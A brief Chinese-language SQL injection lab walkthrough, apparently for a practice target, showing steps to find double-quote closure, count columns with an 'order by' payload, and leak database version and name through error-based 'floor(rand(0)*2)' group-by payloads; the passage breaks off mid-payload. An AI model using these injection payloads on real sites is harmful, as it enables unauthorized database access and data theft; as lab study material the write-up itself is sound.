1、判断SQL语句是使用什么闭合的
使用双引号闭合。
2、判断有几个字段
payload
?id=1" order by 3 --+
存在3个字段
3、爆出数据库版本和当前数据库名
payload
?id=1" union select 1,2,count(1) from information_schema.tables group by concat(floor(rand(0)*2),version()) --+
?id=1" union select 1,2,count(1) from information_schema.tables group by concat(floor(rand